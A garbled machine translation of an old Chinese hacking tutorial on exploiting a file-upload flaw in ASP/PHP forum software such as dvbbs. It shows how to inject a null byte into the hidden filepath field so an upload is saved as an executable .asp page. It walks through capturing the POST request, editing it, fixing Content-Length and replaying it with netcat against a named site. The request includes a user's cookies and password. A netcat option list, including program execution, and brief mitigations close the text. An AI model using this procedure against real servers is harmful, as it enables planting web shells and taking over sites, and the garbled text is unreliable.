PHP/asp upload vulnerability

: Http://lixi4o.lucidpc.net/

1: The transfer vulnerability only applies to ASP and PHP scripts uploaded in Form format *** NC (Netcat) Used to submit data packets Run the following command on the DOS interface: NC-VV www. ****. com 80 <1.txt -VV: Echo 80: www Port 1. txt: The data packet you want to send (For more usage, refer to the post in this area) WSe (wsockexpert) Monitors local ports and captures packets submitted by IE 2: vulnerability Principle Assumptions in the following example Www host: www. ****. com; BBS path:/BBS/ The vulnerability is due to the study of File Uploading through the Internet. It is recommended that you have some programming experience. Check the upfile. asp file of dvbbs. You do not need to understand it all. Upfile is uploaded by generating a form table, as shown below: <Form name = "form" method = "Post" Action = "upfile. asp"...> <Input type = "hidden" name = "filepath" value = "uploadface"> <Input type = "hidden" name = "act" value = "Upload"> <Input type = "file" name = "file1"> <Input type = "hidden" name = "fname"> <Input type = "Submit" name = "Submit" value = "Upload"...> </form> Variables used: Filepath default value: uploadface attribute hiden Act default value upload attribute hiden File1 is the file you want to upload. The key is the filepath variable! By default, our files are uploaded to www. ***. com/BBS/uploadface/ The file is named after your upload time, which is the sentence in upfile. Filename = formpath & year (now) & month (now) & Day (now) & hour (now) & minute (now) & Second (now) & rannum &". "& fileext -------------------------------------- We know that the data in the computer is "1". Anyone who uses C language knows this. Char data [] = "BBS" The data array length is 4: B S. What if we construct the filepath as follows? Filepath = "/newmm. asp" The file we uploaded in, and will change. When no change is made: _ Blank> http: // www. ****. com/BBS/uploadface/20040924020..jpg When we construct a filepath: _ Blank> http: // www. ****. com/newmm. asp/20040924020..jpg In this way, when the server receives filepath data, It is understood that the data in filepath is over. In this way, the files we upload, such as C:. asp Save it as: _ blank> http: // www. ***. com/newmm. asp 3: Supplement later After the vulnerability is published, many websites have processed the vulnerability, but none of them can filter and process the filepath. There are many sites, but only the changes with the nhidenode are added to the upfile.exe on the Internet. Upload Vulnerability exploitation tool or filepath variable exploitation tool (veteran's)... but the most basic is not changed .. There are similar vulnerabilities in website plug-ins. What I want to say is not to rely on specialized tools. Change the filepath variable in the bag caught by WSE, and submit it in NC... Even if he adds n hiden variables, it does not help. Of course, if we strictly filter filepath, our theory will end. This is when our new theory was born! 4: detailed instance: --------------------- One pair of wse (( saved to 1.txt ): Post, BBS, upphoto, and upfile. asp HTTP/1.1 Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/X-Shockwave-flash, application/vnd. MS-Excel, application/vnd. MS-PowerPoint, application/MSWord ,*/* Referer: _ blank> http://www.xin126.com/bbs/upphoto/upload.asp Accept-language: ZH-CN Content-Type: multipart/form-data; boundary = ----------- 7d423a138d0278 Accept-encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;. Net CLR 1.1.4322) HOST: _ blank> www.xin126.com Content-Length: 1969 Connection: keep-alive Cache-control: No-Cache COOKIE: aspsessionidaccccdcs = Beijing; iscome = 1; gamvancookies = 1; regtime = 2004% 2d9% 2d24 + 3% 3a39% 3a37; username = szjwwwww; pass = 5211314; dl = 0; userid = 62; ltstyle = 0; logintry = 1; userpass = eb03f6c72908fd84 ----------------------------- 7d423a138d0278 Content-Disposition: Form-data; name = "filepath" ../Medias/myphoto/ ----------------------------- 7d423a138d0278 ...... Upload --------------- 7d423a138d0278 ----------------- 、Ultraeditopen 1.txt to change data: ...... ----------------------------- 7d423a138d0278 Content-Disposition: Form-data; name = "filepath" /Newmm. asp labels <= the black color indicates that a space is 0x20. Change it to 0x00. ...... ---------------------------- 3. recalculate the cookie length and submit the cookie by NC. NC-VV _ blank> www.xin126.com 80 <1.txt Ultraedit is a 16-bit editor that can be downloaded from the Internet. We mainly used to write the ending Peugeot: ===> 16 bits: 0x00 or 00 h In fact, when you change it, you just need to add a 00 at the end of filepath. Calculate the cookie length ==> after you change fillepath, it must be or + or-the cookie length has changed ...... HOST: _ blank> www.xin126.com Content-Length: 1969 <====== Connection: keep-alive Cache-control: No-Cache ...... Computing? A letter or number is 1 Solutions for upload vulnerabilities: (for reference only) 1. Generally, the upload path is processed as a variable. ==> Our countermeasure is to convert filepath into a constant... This method is currently the most effective (I think) 2. Strengthen the processing. It turns out that we have finished reading this article. We continue to read the start point of the next variable, and the processing will be OK. Appendix: NC usage: Monitor external hosts NC [-options] hostname port [s] [ports]... Listen to local hosts NC-l-P port [Options] [hostname] [port] Options: -D detach from console, stealth mode -E prog inbound program to Exec [dangerous!] -G gateway source-routing hop point [s], up to 8 -G num source-routing pointer: 4, 8, 12 ,... -H this Cruft -I secs delay interval for lines sent, ports scanned -L listen mode, for inbound connects -L listen harder, re-listen on socket close -N Numeric-only IP addresses, no DNS -O file Hex dump of traffic -P port local port number -R randomize local and remote ports -S ADDR local source address -T answer Telnet negotiation -U udp Mode -V verbose [Use twice to be more verbose] -W secs timeout for connects and Final Net reads -Z zero-I/O mode [used for scanning] Port numbers can be individual or ranges: M-N [random sive]